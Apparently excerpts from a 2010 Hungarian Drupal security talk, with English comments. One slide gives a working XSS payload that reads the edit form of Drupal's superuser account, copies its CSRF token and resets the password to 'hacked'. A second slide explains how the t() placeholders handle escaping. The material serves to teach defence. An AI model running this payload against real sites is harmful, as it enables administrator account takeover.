Dcourse security 2010
- 42.
Példa
// Slide example of what script running in a logged-in administrator's browser
// can do on a Drupal site. The slide only labels it "Példa" ("Example");
// presumably it illustrates the impact of an XSS hole -- confirm against the talk.
//
// Defensive takeaways:
//  - Both requests are same-origin and use the victim's session, so the script
//    can read the edit form and reuse its form_token. CSRF tokens therefore do
//    not protect against injected script.
//  - The fix is on the output side: escape or filter every user-supplied value
//    before it is rendered, so that no such script reaches the page.
//  - On the server this arrives as an ordinary POST from the victim's own
//    session; unexpected changes to user 1 are the event worth alerting on.

// Request the edit form of user 1 (Drupal's built-in superuser account).
$.get(Drupal.settings.basePath + 'user/1/edit',
function (data, status) {
if (status == 'success') {
// Values already present in the returned form HTML are pulled out with
// regular expressions and copied into the POST body.
var payload = {
"name": data.match(/id="edit-name" size="[0-9]*" value="([a-z0-9]*)"/)[1],
"mail":
data.match(/id="edit-mail" size="[0-9]*" value="([a-z0-9]*@[a-z0-9]*.[a-z0-9]*)"/)[1],
"form_id": 'user_profile_form',
// The per-form token is readable here because the page is same-origin.
"form_token":
data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]*)"/)[1],
build_id:
data.match(/name="form_build_id" id="(form-[a-z0-9]*)" value="(form-[a-z0-9]*)"/)[1],
// Both password fields carry the same fixed value.
"pass[pass1]": 'hacked', "pass[pass2]": 'hacked'
};
// Submit the form back to the same path the values were read from.
$.post(Drupal.settings.basePath + 'user/1/edit', payload);
}
}
);
- 56.
t()
Plain text → HTML
t('@var', array('@var' => $plain_text));
@: plain text
t('%var', array('%var' => $plain_text));
%: kiemelt szöveg
HTML → HTML
t('!var', array('!var' => $html));
!: raw HTML, inserted without escaping — use only with already-sanitized markup